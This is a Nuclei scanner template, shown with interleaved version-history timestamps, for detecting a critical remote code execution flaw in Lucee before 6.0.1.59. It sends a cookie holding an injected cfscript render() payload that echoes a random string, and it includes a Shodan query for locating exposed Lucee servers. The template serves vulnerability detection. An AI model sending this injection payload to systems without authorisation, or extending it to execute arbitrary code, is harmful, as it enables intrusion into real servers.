nuclei-templates/http/vulnerabilities/lucee-rce.yaml

29 lines
997 B
YAML
Raw Permalink Normal View History

2024-02-15 11:54:00 +00:00
id: lucee-rce
info:
name: Lucee < 6.0.1.59 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
2024-02-15 12:20:25 +00:00
reference:
- https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
2024-02-15 11:54:00 +00:00
metadata:
verified: true
2024-02-15 11:54:00 +00:00
max-request: 1
shodan-query: http.title:"Lucee"
tags: lucee,rce,oast
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
2024-02-15 14:01:35 +00:00
Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');
2024-02-15 11:54:00 +00:00
matchers:
- type: dsl
dsl:
- contains(body, "{{randstr}}")
- contains(header, "cfid")
- contains(header, "cftoken")
2024-02-15 12:20:25 +00:00
condition: and
# digest: 4a0a00473045022060fe80816425743744cb6d3ee5ff6297880c1e513232fd481e5c8844dbea0940022100bb98ce5b02fd42e46d0a71c17251a2d7b7cc8c7169dea74e245eaefa0f3ce228:922c64590222798bb761d5b6d8e72950